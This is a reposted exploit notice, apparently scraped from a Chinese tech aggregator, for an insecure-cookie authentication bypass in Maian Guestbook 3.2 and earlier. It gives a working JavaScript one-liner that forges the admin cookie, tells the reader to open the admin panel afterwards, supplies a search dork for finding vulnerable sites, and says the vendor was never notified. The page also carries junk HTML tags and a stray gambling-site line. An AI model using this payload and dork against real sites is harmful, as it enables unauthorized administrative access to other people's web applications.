<blockquote id="shwb3"><ruby id="shwb3"></ruby></blockquote>
  • <small id="shwb3"><strong id="shwb3"></strong></small>

      1. <big id="shwb3"></big>
        1. 首页 > 系统服务 > 详细

          Maian Guestbook

          时间:2016-01-02 09:51:17      阅读:56923      评论:0      收藏:0      [点我收藏+]

          标签:des   com   http   si   it   java   ha   io   as   

          -[*] ================================================================================ [*]-
          -[*] Maian Guestbook <= 3.2 Insecure Cookie Handling Vulnerability [*]-
          -[*] ================================================================================ [*]-



          [*] Discovered By: S.W.A.T.
          [*] E-Mail: svvateam[at]yahoo[dot]com
          [*] Script Download: http://www.maianscriptworld.co.uk
          [*] DORK: Powered by Maian Guestbook v3.2



          [*] Vendor Has Not Been Notified!



          [*] DESCRIPTION:

          Maian Guestbook suffers from a insecure cookie, the admin panel only checks if the

          cookie exists.
          and not the content. so we can easyily craft a cookie and look like a admin.



          [*] Vulnerability:

          javascript:document.cookie = "gbook_cookie=1; path=/";


          [*] NOTE/TIP:

          after running the javascript, visit "/admin/index.php" to view admin area.



          -[*] ================================================================================ [*]-
          -[*] Maian Guestbook <= 3.2 Insecure Cookie Handling Vulnerability [*]-
          -[*] ================================================================================ [*]-

          Maian Guestbook

          标签:des   com   http   si   it   java   ha   io   as   

          原文:http://www.jb51.net/hack/5660.html

          (0)
          (0)
             
          举报
          评论 一句话评论(0
          0条  
          登录后才能评论!
          ? 2014 bubuko.com 版权所有 鲁ICP备09046678号-4
          打开技术之扣,分享程序人生!
                       

          鲁公网安备 37021202000002号

          t6娱乐平台官方
          <blockquote id="shwb3"><ruby id="shwb3"></ruby></blockquote>
        2. <small id="shwb3"><strong id="shwb3"></strong></small>

            1. <big id="shwb3"></big>
              1. <blockquote id="shwb3"><ruby id="shwb3"></ruby></blockquote>
              2. <small id="shwb3"><strong id="shwb3"></strong></small>

                  1. <big id="shwb3"></big>